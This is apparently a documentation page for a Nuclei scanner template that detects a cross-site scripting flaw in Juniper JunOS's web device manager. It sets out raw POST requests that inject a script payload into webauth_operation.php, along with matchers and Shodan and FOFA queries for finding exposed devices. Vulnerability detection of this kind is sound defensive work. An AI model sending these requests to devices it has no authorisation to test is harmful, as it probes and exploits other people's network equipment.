JunOS - Cross-Site Scripting
ID: junos-xss
Severity: medium
Author: DhiyaneshDK
Tags: junos,xss
Description
Section titled “Description”YAML Source
Section titled “YAML Source”id: junos-xss
info: name: JunOS - Cross-Site Scripting author: DhiyaneshDK severity: medium reference: - https://labs.watchtowr.com/the-second-wednesday-of-the-first-month-of-every-quarter-juniper-0day-revisited/ classification: cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" fofa-query: title="Juniper Web Device Manager" tags: junos,xssvariables: string: "{{to_lower(rand_base(2))}}"
http: - raw: - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
rs=emit_debug_note&rsargs[]={{string}}&rsargs[]=<script>alert('document.domain');</script> - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
rs=sajax_show_one_stub&rsargs[]={{string}}<script>alert('document.domain');</script>
stop-at-first-match: true
matchers-condition: or matchers: - type: word name: emit-debug-note-xss words: - "ERROR: <script>alert('document.domain');</script>" - "monospace" condition: and
- type: word name: sajax-show-one-stub-xss words: - "<script>alert('document.domain');</script>" - "wrapper for" condition: and# digest: 4a0a0047304502205509ab4fb3ccf422d477ca68806b6ccc107ad2ac2e9ec18d1cd6ece81238dedf022100f5dffd6335836ba306bbf27b9e94bc5f0e13482a3cab49521b1797060bbcf0a1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/juniper/junos-xss.yaml"